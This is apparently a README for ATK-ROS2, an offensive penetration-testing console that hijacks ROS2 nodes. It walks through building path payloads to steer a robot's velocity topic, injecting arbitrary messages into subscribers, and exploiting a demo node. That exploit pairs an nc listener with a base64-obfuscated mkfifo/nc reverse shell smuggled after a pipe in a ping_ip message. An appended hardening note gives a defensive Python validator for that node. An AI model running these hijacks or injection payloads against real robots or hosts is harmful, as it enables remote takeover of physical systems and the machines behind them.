Environment Requirement: Ubuntu 22.04 (Jammy) or later
This is a penetration testing environment for ROS2, designed as a production-like attack box.
# Upgrade pip
$ pip install --upgrade pip
# Install Python requirements
$ pip install -r requirements.txt --config-settings --confirm-license= --verbose
# Make the install script executable
$ chmod +x ./install/ros2-install.sh
# Run ROS2 install script with sudo
$ sudo ./install/ros2-install.sh
$ python3 atk_builder.py
- This is a payload builder module used to hijack specific ROS2 nodes, manipulate paths, and modify execution flow.
- It generates .atk files that can be used with the ATK-ROS2 program.
$ python3 atk_ros2.py
ATK-ROS2$ help
Global commands:
show - Show all boards
search <keyword> - Search boards
use <board_name> - Select a board
node - List ROS2 nodes/topics
hijack - Hijack nodes with geometry_msgs/msg/Twist
exit / back - Return to previous level or exit
quit - Exit console immediately
- Displays all available modules/boards
ATK-ROS2$ show
Available Boards
================================================================================
# Name Description
--------------------------------------------------------------------------------
0 action_msgs/msg/GoalInfo ROS2 Message Board
1 action_msgs/msg/GoalStatus ROS2 Message Board
<SNIP>...
194 visualization_msgs/msg/MeshFile ROS2 Message Board
195 visualization_msgs/msg/UVCoordinate ROS2 Message Board
- Enter a specific module:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ info
- Shows the parameters required by the current module:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ set u 999
- Set a parameter value:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ node
- Lists nodes compatible with the current module:
Tip: Running node at the root menu lists all ROS2 nodes.
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ run
- Launch the payload:
ATK-ROS2[visualization_msgs/msg/UVCoordinate]$ back
- Return to the previous menu:
ATK-ROS2$ hijack
- Hijack a ROS2 device, e.g., for path control:
- Launch ATK-Builder to construct the payload
$ python3 atk_builder.py
- The center is used as the starting point, with the red circle as a reference radius.
- Set the first point:
- Set the second point:
- Set the third point:
You can set an unlimited number of points based on your needs. The turtle will follow the points in the order you defined.
- Save the .atk file:
/home/map/Desktop/atk-ros2/payload.atk
- Start the turtlesim test program on another host
$ ros2 run turtlesim turtlesim_node
- Launch the ROS2 pentest box
$ python3 atk_ros2.py
- List all nodes:
ATK-ROS2$ node
- Enter hijack mode and select option 1:
ATK-ROS2$ hijack
- Input the .atk file and specify the target control node:
? Select hijack mode: 1. Drawing coordinates hijack
? Enter path to .atk file /home/map/Desktop/atk-ros2/payload.atk
[+] Successfully loaded 6 points, sending Twist messages...
? Enter target node/topic (e.g., turtle1/cmd_vel) turtlesim/turtle1/cmd_vel
- Send the payload:
- The turtle successfully follows the hijacked path:
- Use the std_msgs/msg/String module
ATK-ROS2$ use std_msgs/msg/String
ATK-ROS2[std_msgs/msg/String]$ node
- Set the target node and payload
ATK-ROS2[std_msgs/msg/String]$ set node string_subscriber/string_topic
ATK-ROS2[std_msgs/msg/String]$ set data Pw3d!
ATK-ROS2[std_msgs/msg/String]$ run
Victim side:
- You can also send content from a file:
ATK-ROS2[std_msgs/msg/String]$ set data file:/home/map/Desktop/atk-ros2/demo/msg.txt
ATK-ROS2[std_msgs/msg/String]$ run
Victim side:
- In the demo, a vulnerable backdoor node has been implemented.
- If interested, you can also explore industrial exploit tools like S-Clustr and Tyran.
Victim side:
- Upload the backdoor node to the controlled host:
$ cd ./demo/command_host_service
$ ./start.sh
Attacker side:
ATK-ROS2$ node
$ sudo nc -lvnp 443
ATK-ROS2$ use std_msgs/msg/String
ATK-ROS2[std_msgs/msg/String]$ set node ping_service_subscriber/ping_ip
ATK-ROS2[std_msgs/msg/String]$ set data 127.0.0.1| echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxzaCAtaSAyPiYxfG5jIDE5Mi4xNjguMC4xMTkgNDQzID4vdG1wL2Y=|base64 -d |bash
ATK-ROS2[std_msgs/msg/String]$ exploit
- The target was successfully hit:
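
Hardening note (an added example, not code from this project): the ping_ip message above only has an effect if the subscriber hands the topic text to a shell. The sketch below assumes the demo node runs ping on the received string (its source is not shown here) and gives a handler body that accepts only a literal IP address and never invokes a shell. The names parse_ping_target, build_ping_argv and on_ping_ip are hypothetical, and the sample messages are constructed.

```python
import ipaddress
import subprocess

# Constructed sample messages for the ping_ip topic (not captured traffic).
SAMPLES = ["127.0.0.1", "::1", "127.0.0.1| echo constructed", "fe80::1%eth0", " 10.0.0.5"]


def parse_ping_target(data):
    """Return the canonical text of a literal IP address, else raise ValueError."""
    # ip_address() also accepts ints and packed bytes; a String message must be str.
    if not isinstance(data, str):
        raise ValueError("target must be text")
    addr = ipaddress.ip_address(data)  # rejects spaces, pipes, hostnames
    # Python 3.9+ accepts an IPv6 zone ("%...") holding arbitrary characters.
    if getattr(addr, "scope_id", None) is not None:
        raise ValueError("IPv6 zone identifiers are not accepted")
    return str(addr)


def build_ping_argv(data):
    """Build an argument vector; the address is one argv element, never shell text."""
    return ["ping", "-c", "1", "-W", "2", parse_ping_target(data)]


def on_ping_ip(data, runner=subprocess.run):
    """Hypothetical subscriber callback body: run ping, or return None if rejected."""
    try:
        argv = build_ping_argv(data)
    except ValueError:
        return None  # drop the message; a real node would also log it
    return runner(argv, shell=False, capture_output=True, timeout=5, check=False)


if __name__ == "__main__":
    for sample in SAMPLES:
        # Dry run: show the decision without executing ping.
        result = on_ping_ip(sample, runner=lambda argv, **kw: argv)
        print(repr(sample), "->", result if result else "rejected")
```

Input validation closes this one injection path only; any participant on the ROS2 graph can still publish to the topic unless SROS2 authentication and access control are enabled.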